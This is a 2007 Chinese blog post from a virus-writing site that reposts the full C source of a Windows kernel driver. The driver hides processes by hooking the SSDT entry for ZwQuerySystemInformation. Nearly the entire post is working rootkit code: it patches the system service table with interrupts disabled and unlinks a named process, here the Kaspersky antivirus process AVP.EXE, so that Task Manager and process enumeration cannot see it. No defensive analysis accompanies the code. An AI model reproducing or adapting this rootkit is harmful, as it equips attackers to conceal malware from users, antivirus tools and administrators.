VX Z0ne
-
2007-06-21
HOOK SSDT实现进程隐藏 - [病毒技术]
版权声明:转载时请以超链接形式标明文章原始出处和作者信息及本声明
http://romio64.blogbus.com/logs/6051228.html
/*
##################################################################
HideProc.CAuthor :robinh00d[F-13 Lab]
Email :cr4zyexpl0rer_at_gmail.com
HomePage :http://cr4zyexpl0rer.googlepages.com
Last Updated :2006-03-23
个人练习之作,都是几年前的老技术了
基本上是copy别人的代码
通过HOOK SSDT来实现对指定进程的隐藏
windows自带的任务管理器以及PSAPI都是利用ZwQuerySystemInformation
来实现进程的遍历
##################################################################
*/#include "dbghelp.h"
#include "HideProc.h"
#include "ntddk.h"
#include "stdlib.h"typedef struct ServiceDescriptorEntry {
unsigned int *ServiceTableBase;
unsigned int *ServiceCounterTableBase;
unsigned int NumberOfServices;
unsigned char *ParamTableBase;
} ServiceDescriptorTableEntry_t, *PServiceDescriptorTableEntry_t ;__declspec(dllimport) ServiceDescriptorTableEntry_t KeServiceDescriptorTable ;
#define SYSTEMSERVICE(_fun) KeServiceDescriptorTable.ServiceTableBase[*(PLONG) ((PUCHAR)_fun +1)]
struct _SYSTEM_THREADS
{
LARGE_INTEGER KernelTime;
LARGE_INTEGER UserTime;
LARGE_INTEGER CreateTime;
ULONG WaitTime;
PVOID StartAddress;
CLIENT_ID ClientIs;
KPRIORITY Priority;
KPRIORITY BasePriority;
ULONG ContextSwitchCount;
ULONG ThreadState;
KWAIT_REASON WaitReason;
};struct _SYSTEM_PROCESSES
{
ULONG NextEntryDelta;
ULONG ThreadCount;
ULONG Reserved[6];
LARGE_INTEGER CreateTime;
LARGE_INTEGER UserTime;
LARGE_INTEGER KernelTime;
UNICODE_STRING ProcessName;
KPRIORITY BasePriority;
ULONG ProcessId;
ULONG InheritedFromProcessId;
ULONG HandleCount;
ULONG Reserved2[2];
VM_COUNTERS VmCounters;
IO_COUNTERS IoCounters;
struct _SYSTEM_THREADS Threads[1];
} ;typedef NTSTATUS
(*ZWQUERYSYSTEMINFORMATION)(ULONG SystemInformationCLass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength
) ;ZWQUERYSYSTEMINFORMATION OriZwQuerySystemInformation ;
NTSYSAPI NTSTATUS NTAPI ZwQuerySystemInformation(IN ULONG SystemInformationClass,
IN PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength) ;VOID HidefileUnload(IN PDRIVER_OBJECT DriverObject) ;
NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath) ;
NTSTATUS HidefileDispatch(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp) ;#ifdef ALLOC_PRAGMA
#pragma alloc_text(INIT, DriverEntry)
#pragma alloc_text(PAGE, HidefileDispatch)
#pragma alloc_text(PAGE, HidefileUnload)
#endif // ALLOC_PRAGMANTSTATUS
HidefileDispatch(
IN PDEVICE_OBJECT DeviceObject,
IN PIRP Irp
)
{
Irp->IoStatus.Information = 0;
Irp->IoStatus.Status = STATUS_SUCCESS;
IoCompleteRequest(Irp, IO_NO_INCREMENT);
return STATUS_SUCCESS ;
}VOID
HidefileUnload(
IN PDRIVER_OBJECT DriverObject
)
{
//恢复ZwQuerySystemInformation入口
__asm cli
(ZWQUERYSYSTEMINFORMATION)(SYSTEMSERVICE(ZwQuerySystemInformation)) = \
OriZwQuerySystemInformation ;
__asm sti
}/*
##################################################################
自定义的ZwQuerySystemInformation
过滤掉指定的进程
##################################################################
*/NTSTATUS
NewZwQuerySystemInformation(ULONG SystemInformationCLass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength
)
{
NTSTATUS ntStatus ;
ANSI_STRING ProcName ;ntStatus = OriZwQuerySystemInformation(SystemInformationCLass, \
SystemInformation, \
SystemInformationLength, \
ReturnLength) ;
//如果执行成功
if (NT_SUCCESS(ntStatus))
{
//如果是SystemProcessedAndThreadsInformation
if (5 == SystemInformationCLass)
{
struct _SYSTEM_PROCESSES *pCurrSP = (struct _SYSTEM_PROCESSES *)SystemInformation ;//当前指针
struct _SYSTEM_PROCESSES *pPrevSP = NULL ;//上一个指针
//遍历进程链表,过滤指定的进程名while(pCurrSP)
{
RtlUnicodeStringToAnsiString(&ProcName, &pCurrSP->ProcessName, TRUE) ;
if ((0 < ProcName.Length) && (255 > ProcName.Length))
{
//隐藏AVP的进程
if (!memcmp(ProcName.Buffer, "AVP.EXE", 11))
{
DbgPrint("Can You Find The AVP? ;-)") ;//遍历进程链表
if (pPrevSP)
{
if (pCurrSP->NextEntryDelta)//是中间的进程
{
pPrevSP->NextEntryDelta += pCurrSP->NextEntryDelta ;
}
else//是末尾的进程
{
pPrevSP->NextEntryDelta = 0 ;
}
}
else
{
if (pCurrSP->NextEntryDelta) //是链表中第一个进程
{
(unsigned char *)SystemInformation += pCurrSP->NextEntryDelta ;
}
else //是链表中的唯一一个进程
{
SystemInformation = NULL ;
}
}
}
}
RtlFreeAnsiString(&ProcName);pPrevSP = pCurrSP ;
if (pCurrSP->NextEntryDelta)
{
(unsigned char *)pCurrSP += pCurrSP->NextEntryDelta ;
}
else
{
pCurrSP = NULL ;
}
}
}
}
return ntStatus ;
}NTSTATUS
DriverEntry(
IN PDRIVER_OBJECT DriverObject,
IN PUNICODE_STRING RegistryPath
)
{
int i = 0 ;DbgPrint("Driver Loaded Success!") ;
for (; i < IRP_MJ_MAXIMUM_FUNCTION; i++)
{
DriverObject->MajorFunction[i] = HidefileDispatch ;
}DriverObject->DriverUnload = HidefileUnload ;
OriZwQuerySystemInformation = \
(ZWQUERYSYSTEMINFORMATION)(SYSTEMSERVICE(ZwQuerySystemInformation)) ;
__asm cli
(ZWQUERYSYSTEMINFORMATION) (SYSTEMSERVICE(ZwQuerySystemInformation)) = \
NewZwQuerySystemInformation ;
__asm sti
return STATUS_SUCCESS ;
}随机文章:
修改活动进程链隐藏进程 2007-10-15Virus.Win32.Mock 2007-07-07修改PE的e_lfnew感染法 2007-06-25Virus.Win32.Downloader.c分析 2007-06-25OllyDbg's fault 2007-06-21
收藏到:Del.icio.us
